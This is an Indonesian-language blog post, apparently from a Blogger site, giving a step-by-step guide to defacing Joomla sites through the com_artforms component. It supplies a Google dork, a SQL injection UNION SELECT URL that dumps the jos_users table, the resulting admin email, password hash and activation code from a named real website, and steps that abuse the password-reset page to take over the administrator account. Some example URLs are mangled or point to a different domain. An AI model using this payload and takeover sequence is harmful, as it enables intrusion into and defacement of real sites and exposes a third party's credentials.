Cara Defae Joomla 1

10:10:00 PM By ali sahidin 0 comments


targetnya


cari di google
pake dork ini

option com_artforms

kita dapat target yaitu :


http://www.opera-verona.it/

di exploid
ni kodenya di paste




/index.php?option=com_artforms&task=vferforms&id=1 UNION SELECT 1,2,3,version(),5,concat_ws(0x3a,activation,0x3a,email,0x3a,username,0x3a,password)+from+jos_users



menjadi

http://www.opera-verona.it/http://index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users

disitu udah kelihatan emailnya

d.giardini@ideaverona.com

dari
:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi


terus


copy code reset pass ini

index.php?option=com_user&view=reset


buka tab baru

http://www.opera-verona.it/

terus masukin kode reset paswordnya  menjadi seperti ini :


http://www.centroanagnina.com/web/index.php?option=com_user&view=reset

 setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadi
yaitu

d.giardini@ideaverona.com
 enter

setelah di enter
anda disuruh masukin code :

kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi

 (kita reload ya ) kalo ga tw reload tekan F5 di komputer ))

http://www.opera-verona.it//index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users

 disitu kita melihat code :

Form disponibili: 2
eda7d6142fac40a533b56407a4617371:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi


kodenya :
eda7d6142fac40a533b56407a4617371


setelah kita lihat kode tadi kita kembali ke halaman


http://www.opera-verona.it/index.php?option=com_user&view=reset&layout=confirm

untuk memasukan kode
eda7d6142fac40a533b56407a4617371

setelah kita masukin kode
kita enter


setelah enter
nanti kita disitu tersedia 2 kotak yg harus di isi

(disuruh masukin pasword and verify pasword)

masukin pasword yg anda inginkan

misalkankitamasukin

pasword  :  alisahidin
dandi veryfikasinya  : alisahidin

setelah itu enter

setelah enter disitu kita disuruh masukin nama dan pasword

kita lewatin aja
dan kita masuk ke tabe baru lagi

( http://web target/administrator/)


http://www.opera-verona.it/administrator/

setelah buka kita disuruh masukin nama dan pasword

nama kita lihat di halaman yg kita reload tadi yg ini

http://www.opera-verona.it/http://index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,2,3,version%28%29,5,concat_ws%280x3a,activation,0x3a,email,0x3a,username,0x3a,password%29+from+jos_users

disitu kita dapat

:::d.giardini@ideaverona.com:::admin:::dc7edcfda44d880f8a0e5e828675ed0a:kkATnYtNP3YDlrFilCAxnt89yrvHw4mi


nah nama yg kita maksud adalah :

admin


kita kembali ke halaman


http://www.opera-verona.it/administrator/

dan kita
masukin admin
dan paswordnya adalah
alisahidin   (pasword yg kita buat tadi)

udah sekarang jadi deh
kita masuk ke halaman administrator mereka

About the Author

Written by Admin

ChromeGT is a modern, powerful and professional Blogger template made for your Portfolio, Business or almost any other kind of website.


0 comments:

Subscribe to: Post Comments (Atom)